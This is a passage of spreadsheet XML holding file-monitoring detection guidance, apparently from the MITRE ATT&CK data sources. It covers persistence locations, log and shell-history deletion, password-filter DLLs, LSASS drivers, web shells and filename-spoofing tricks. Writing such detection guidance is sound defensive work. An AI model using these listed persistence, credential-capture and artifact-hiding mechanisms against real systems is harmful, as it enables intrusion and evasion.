    <t>Monitor for newly constructed files that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>Monitor newly constructed .manifest and .local redirection files that do not correlate with software updates.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files in common folders on the computer system.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files in user directories.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files in order to manipulate external outcomes or hide activity</t>
  </si>
  <si>
    <t>Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed visual content for internal or external enterprise networks. </t>
  </si>
  <si>
    <t>Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files written to disk to gain access to a system through a user visiting a website over the normal course of browsing.</t>
  </si>
  <si>
    <t>Monitor for newly constructed dylibs</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that are added to absolute paths of shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files containing large amounts of data. Abnormal file sizes may be an indicator of embedded content.</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files created in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor newly constructed files that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed files to match an existing service executable, it could be detected and correlated with other suspicious behavior.  </t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources </t>
  </si>
  <si>
    <t>Monitor for newly constructed files via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging. Consider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading ".”</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may execute their own malicious payloads by hijacking the way operating systems run programs.</t>
  </si>
  <si>
    <t>Monitor for creation of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules.</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred into the network</t>
  </si>
  <si>
    <t>Monitor creation of files associated with installer packages that may be abused for malicious execution.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may deface systems internal to an organization in an attempt to intimidate or mislead users.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may modify the kernel to automatically execute programs on system boot.</t>
  </si>
  <si>
    <t>Monitor newly constructed files that may modify or add LSASS drivers to obtain persistence on compromised systems.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor newly constructed files to/from a lateral tool transfer </t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>Monitor for new files added to the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder. The System LaunchDaemons are protected by SIP.</t>
  </si>
  <si>
    <t>Monitor for the creation of and/or changes to login hook files (&lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt;), especially by unusual accounts outside of normal administration duties.</t>
  </si>
  <si>
    <t>All login items created via shared file lists are viewable by using the System Preferences GUI or in the &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt; file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited.</t>
  </si>
  <si>
    <t>Monitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as &lt;code&gt;services.msc&lt;/code&gt; or &lt;code&gt;eventvwr.msc&lt;/code&gt;. Invoking non-Microsoft .msc files may be an indicator of malicious activity.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).</t>
  </si>
  <si>
    <t>malicious documents and files that are downloaded from a link and executed on the user's computer</t>
  </si>
  <si>
    <t>Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.</t>
  </si>
  <si>
    <t>Monitor for suspicious additions to the `/Library/Security/SecurityAgentPlugins` directory.(Citation: Xorrior Authorization Plugins)</t>
  </si>
  <si>
    <t>Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious</t>
  </si>
  <si>
    <t>Monitor for newly constructed files by unusual accounts outside of normal administration duties</t>
  </si>
  <si>
    <t>Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may leverage Microsoft Office-based applications for persistence between startups.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may abuse Microsoft Office templates to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Also, monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.</t>
  </si>
  <si>
    <t>Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Also, monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files from a phishing messages to gain access to victim systems.</t>
  </si>
  <si>
    <t>Monitor newly constructed files that may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.</t>
  </si>
  <si>
    <t>Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for new profiles. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
* &lt;code&gt;$PsHome\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$PsHome\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed /etc/rc.local file </t>
  </si>
  <si>
    <t>Monitor for newly constructed files on removable media</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications.</t>
  </si>
  <si>
    <t>Monitor for common cryptomining files on local systems that may indicate compromise and resource usage</t>
  </si>
  <si>
    <t>Monitor for newly constructed files associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V).</t>
  </si>
  <si>
    <t>Monitor newly constructed files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.</t>
  </si>
  <si>
    <t>Monitor newly constructed files that may establish persistence by executing malicious content triggered by user inactivity.</t>
  </si>
  <si>
    <t>Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.</t>
  </si>
  <si>
    <t>Monitor for creation of binaries and service executables that do not occur during a regular software update or an update scheduled by the organization. This behavior also considers files that are overwritten.</t>
  </si>
  <si>
    <t>Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic) Analysis should attempt to relate shortcut creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files from a spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.</t>
  </si>
  <si>
    <t>Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.</t>
  </si>
  <si>
    <t>Systemd service unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;/home/&lt;username&gt;/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links</t>
  </si>
  <si>
    <t>Monitor for newly constructed files from files that write or overwrite many files to a network shared directory may be suspicious.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may establish persistence by executing malicious content triggered by an interrupt signal.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may establish persistence through executing malicious commands triggered by a user’s shell. For most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the &lt;code&gt;/etc/shells&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).</t>
  </si>
  <si>
    <t>File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)</t>
  </si>
  <si>
    <t>Malicious XDG autostart entries may be detected by auditing file creation events within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; and &lt;code&gt;~/.config/autostart&lt;/code&gt; directories. Depending on individual configurations, defenders may need to query the environment variables &lt;code&gt;$XDG_CONFIG_HOME&lt;/code&gt; or &lt;code&gt;$XDG_CONFIG_DIRS&lt;/code&gt; to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of a command history file, such as ConsoleHost_history.txt, ~/.zsh_history, or ~/.bash_history.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected deletion of a system log file, typically stored in /var/logs or /Library/Logs. </t>
  </si>
  <si>
    <t>Monitor for deletion of generated artifacts on a host system, including logs or captured files such as quarantined emails. 
On Windows 10, mail application data is stored in &lt;code&gt;C:\Users\Username\AppData\Local\Comms\Unistore\data&lt;/code&gt;. On Linux, mail data is stored in &lt;code&gt;/var/spool/mail&lt;/code&gt; or &lt;code&gt;/var/mail&lt;/code&gt;. On macOS, mail data is stored in &lt;code&gt;~/Library/Mail&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor for a file that may delete or alter generated artifacts associated with persistence on a host system.</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of Windows event logs (via native binaries) and may also generate an alterable event (Event ID 1102: "The audit log was cleared")</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of  client software binaries to establish persistent access to systems.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected deletion to a file (ex: Sysmon EID 23) </t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected deletion of a file in order to manipulate external outcomes or hide activity </t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of files from the system</t>
  </si>
  <si>
    <t>Monitor for a file that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).</t>
  </si>
  <si>
    <t>Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file.</t>
  </si>
  <si>
    <t>Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment</t>
  </si>
  <si>
    <t>Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity.</t>
  </si>
  <si>
    <t>Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc that would aid in the manipulation of data to hide activity</t>
  </si>
  <si>
    <t>Depending on the method used to obfuscate API function calls, a file-based signature may be capable of detecting dynamical resolution.(Citation: Huntress API Hash)(Citation: BlackHat API Packers)(Citation: MITRECND FindAPIHash)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor contextual data about a file that may highlight embedded payloads, which may include information such as name, the content (ex: signature, headers, or data/media), file size, etc.; correlate with other suspicious behavior to reduce false positives.  </t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership.</t>
  </si>
  <si>
    <t>Review &lt;code&gt;false&lt;/code&gt; values under the &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; entry in an application's &lt;code&gt;Info.plist&lt;/code&gt; file (required by every application). &lt;code&gt;false&lt;/code&gt; under &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; entry will default to not setting the quarantine flag.
QuarantineEvents is a SQLite database containing a list of all files assigned the &lt;code&gt;com.apple.quarantine&lt;/code&gt; attribute, located at &lt;code&gt;~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2&lt;/code&gt;. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed. (Citation: TheEclecticLightCompany Quarantine and the flag)</t>
  </si>
  <si>
    <t>Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions may set files and directories to be hidden to evade detection mechanisms.</t>
  </si>
  <si>
    <t>Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>Monitor for contextual file data that may show signs of deletion or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</t>
  </si>
  <si>
    <t>Monitor for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership. Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.</t>
  </si>
  <si>
    <t>Monitor files (especially those downloaded from untrusted locations) for MOTW attributes. Also consider inspecting and scanning file formats commonly abused to bypass MOTW (ex: .arj, .gzip, .iso, .vhd).</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”.</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.</t>
  </si>
  <si>
    <t>Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, may use NTFS file attributes to hide their malicious data in order to evade detection. Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA)</t>
  </si>
  <si>
    <t>Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.
File-based signatures may be capable of detecting code obfuscation depending on the methods used.(Citation: Huntress API Hash)(Citation: BlackHat API Packers)(Citation: MITRECND FindAPIHash)</t>
  </si>
  <si>
    <t>Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)</t>
  </si>
  <si>
    <t>Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity.</t>
  </si>
  <si>
    <t>Identify files with the &lt;code&gt;com.apple.ResourceFork&lt;/code&gt; extended attribute and large data amounts stored in resource forks.</t>
  </si>
  <si>
    <t>Monitor for common formats of RTLO characters within filenames such as \u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.</t>
  </si>
  <si>
    <t>Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/ower, permissions, etc.</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set.</t>
  </si>
  <si>
    <t>Monitor for spaces at the end of file names, that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.</t>
  </si>
  <si>
    <t>Detecting the presence of stripped payloads may be difficult and unwarranted in real-time, though analyzing contextual data about files (such as content and character entropy) may highlight attempts at obfuscation.</t>
  </si>
  <si>
    <t>Monitor for file modifications that collects information on file handle opens and can compare timestamp values</t>
  </si>
  <si>
    <t>If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the &lt;code&gt;PROJECT&lt;/code&gt; stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the &lt;code&gt;PROJECT&lt;/code&gt; stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)</t>
  </si>
  <si>
    <t>Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.</t>
  </si>
  <si>
    <t>On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file. Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious.</t>
  </si>
  <si>
    <t>Monitor for changes made to files related to account settings, such as `/etc/ssh/sshd_config` and the authorized_keys file for each user on a system.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.</t>
  </si>
  <si>
    <t>On Windows, monitor Windows Task Scheduler stores in `%systemroot%\System32\Tasks` for change entries related to scheduled tasks, especially those that do not correlate with known software, patch cycles, etc. On Linux and macOS, all [at](https://attack.mitre.org/software/S0110) jobs are stored in &lt;code&gt;/var/spool/cron/atjobs/&lt;/code&gt;.(Citation: rowland linux at 2019)</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that are modified by unusual accounts outside of normal administration duties.</t>
  </si>
  <si>
    <t>Monitor for changes made to command history files, such as ConsoleHost_history.txt, ~/.zsh_history, or ~/.bash_history, for unexpected modifications to contents, access permissions, and attributes.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to system log files, typically stored in  /var/log or /Library/Logs, for unexpected modifications to access permissions and attributes </t>
  </si>
  <si>
    <t>Monitor for changes made to generated artifacts on a host system, including logs or captured files such as quarantined emails. 
On Windows 10, mail application data is stored in &lt;code&gt;C:\Users\Username\AppData\Local\Comms\Unistore\data&lt;/code&gt;. On Linux, mail data is stored in &lt;code&gt;/var/spool/mail&lt;/code&gt; or &lt;code&gt;/var/mail&lt;/code&gt;. On macOS, mail data is stored in &lt;code&gt;~/Library/Mail&lt;/code&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor changes to files that may be indicators of deleting or altering malicious network configuration settings as well as generated artifacts on a host system that highlight network connection history, such as &lt;code&gt;Default.rdp&lt;/code&gt; or &lt;code&gt;/var/log/&lt;/code&gt;. </t>
  </si>
  <si>
    <t>Monitor for changes made to a file may delete or alter generated artifacts associated with persistence on a host system.</t>
  </si>
  <si>
    <t>Monitor changes to client software that do not correlate with known software or patch cycles.</t>
  </si>
  <si>
    <t>Monitor for changes to files associated with system-level processes.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to files for unexpected modifications to access permissions and attributes </t>
  </si>
  <si>
    <t>Monitor for changed made to .manifest/.local redirection files, or file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to files for unexpected modifications to access permissions and attributes  </t>
  </si>
  <si>
    <t>Monitor for changes made to a large quantity of files for unexpected modifications in user directories and under C:\Windows\System32\.</t>
  </si>
  <si>
    <t>Monitor for changes made to files in user directories.</t>
  </si>
  <si>
    <t>Monitor for unexpected files with manipulated data in order to manipulate external outcomes or hide activity</t>
  </si>
  <si>
    <t>Monitor for changes made to files for unexpected modifications to internal and external websites for unplanned content changes.</t>
  </si>
  <si>
    <t>Monitor for changes made to files for unexpected modifications that attempt to hide artifacts.</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as Modify System Image and Network Device CLI. Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>Monitor for changes to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t>Monitor for changes made to the operating system of a network device because image downgrade may be used in conjunction with  [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file.</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process.</t>
  </si>
  <si>
    <t>Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.</t>
  </si>
  <si>
    <t>On MacOS systems, monitor for modifications to the &lt;code&gt;RulesActiveState.plist&lt;/code&gt;, &lt;code&gt;SyncedRules.plist&lt;/code&gt;, &lt;code&gt;UnsyncedRules.plist&lt;/code&gt;, and &lt;code&gt;MessageRules.plist&lt;/code&gt; files.(Citation: MacOS Email Rules)</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes to binaries and service executables that may normally occur during software updates. </t>
  </si>
  <si>
    <t>Monitor external websites for unplanned content changes.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to the .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources </t>
  </si>
  <si>
    <t>The removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. Also monitor software update frameworks that may strip this flag when performing updates.</t>
  </si>
  <si>
    <t>Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may use hidden users to mask the presence of user accounts they create or modify. Monitor for changes made to the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; plist file for unexpected modifications to the &lt;code&gt; Hide500Users&lt;/code&gt; key value on macOS.(Citation: Cybereason OSX Pirrit)</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may use hidden windows to conceal malicious activity from the plain sight of users. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.</t>
  </si>
  <si>
    <t>Monitor for suspicious modification of files associated with hybrid identity authentication processes, such as configuration files. Monitor for access to certificates and cryptographic keys material.</t>
  </si>
  <si>
    <t>Monitor for modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to &lt;code&gt;%windir%\system32\inetsrv\config\applicationhost.config&lt;/code&gt; could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)</t>
  </si>
  <si>
    <t>Monitor for changes made to a file may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>Monitor internal and websites for unplanned content changes.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may modify the kernel to automatically execute programs on system boot.</t>
  </si>
  <si>
    <t>Monitor file systems for changes to application binaries and invalid checksums/signatures.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may modify or add LSASS drivers to obtain persistence on compromised systems.</t>
  </si>
  <si>
    <t>Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.</t>
  </si>
  <si>
    <t>Monitor files for changes that may create or modify Launch Daemons to execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Plist files are located in the root, system, and users &lt;code&gt;/Library/LaunchAgents&lt;/code&gt; or &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; folders. [Launch Agent](https://attack.mitre.org/techniques/T1543/001) or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious.</t>
  </si>
  <si>
    <t>Monitor for changes to login hook files (&lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt;), especially by unusual accounts outside of normal administration duties.</t>
  </si>
  <si>
    <t>Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.</t>
  </si>
  <si>
    <t>Monitor for suspicious modification of files associated with authentication processes, such as configuration files and module paths (e.g. `/etc/pam.d/`). Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files. Also monitor for access to certificates and cryptographic keys material.</t>
  </si>
  <si>
    <t>Most embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because this method may be used in conjunction with  [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file.
Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised. (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)</t>
  </si>
  <si>
    <t>There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: &lt;code&gt;file.ext:ads[.ext]&lt;/code&gt;) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.</t>
  </si>
  <si>
